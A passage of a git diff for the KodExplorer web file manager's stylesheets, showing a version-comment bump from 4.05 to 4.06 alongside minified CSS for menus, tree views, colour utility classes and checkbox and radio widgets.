background:rgba(242,242,242,0.2);} body #body .menu-left .setting a.selected, body #body .app-menu-left .setting a.selected{ background:rgba(255,255,255,0.2);border-color:rgba(255,255,255,0.7);color:#fff;} body #body .menu-left .line, body #body .app-menu-left .line{ color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);} body #body .user-list a{ color:#2a6496;} body #body .system-content .left-frame .left-content .ztree li a{ text-shadow:none;} body #body .system-content .left-frame .left-content .ztree li a.hover{ background:#eee;border-color:#eee;} body #body .system-content .left-frame .left-content .ztree li a.curSelectedNode{ background:#63acff;border:1px solid #63acff;} body#page-explorer .task-tab, body#page-editor .task-tab{ background:rgba(255,255,255,0.2);border-color:rgba(255,255,255,0.3);} body .ztree li a{ color:#fff;border-radius:3px;margin:0 4px 0 4px;background:transparent;border-color:transparent;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .ztree li a:hover{ background:rgba(234,234,234,0.15);border-color:transparent;} body .ztree li a span.button.switch{ opacity:0.8;filter:alpha(opacity=80);} body .ztree li a span.button.switch:after{ color:#cccccc;} body .ztree li a span.button.switch.noline_open:after, body .ztree li a span.button.switch.noline_open_hover:after{ color:#e6e6e6;} body .ztree li a.curSelectedNode, body .ztree li a.curDropTreeNode{ background:rgba(234,234,234,0.33);border-color:transparent;} body .ztree li a.curSelectedNode .noline_open:after, body .ztree li a.curSelectedNode .noline_open_hover:after, body .ztree li a.curSelectedNode .noline_close:after, body .ztree li a.curDropTreeNode .noline_open:after, body .ztree li a.curDropTreeNode .noline_open_hover:after, body .ztree li a.curDropTreeNode .noline_close:after{ color:#fff !important;} body .ztree.group-list-tree li a{ color:#444;text-shadow:none;} body.setting-page .ztree li a{ color:inherit;}} -/* ver 4.05(2017-08-26) [build 1503738071.6485] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.5251] */ \ No newline at end of file diff --git a/static/style/skin/base/app_code_edit.css b/static/style/skin/base/app_code_edit.css index 5baf433..a0e97f8 100755 --- a/static/style/skin/base/app_code_edit.css +++ b/static/style/skin/base/app_code_edit.css @@ -1,5 +1,5 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738067.3554] */ -body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ 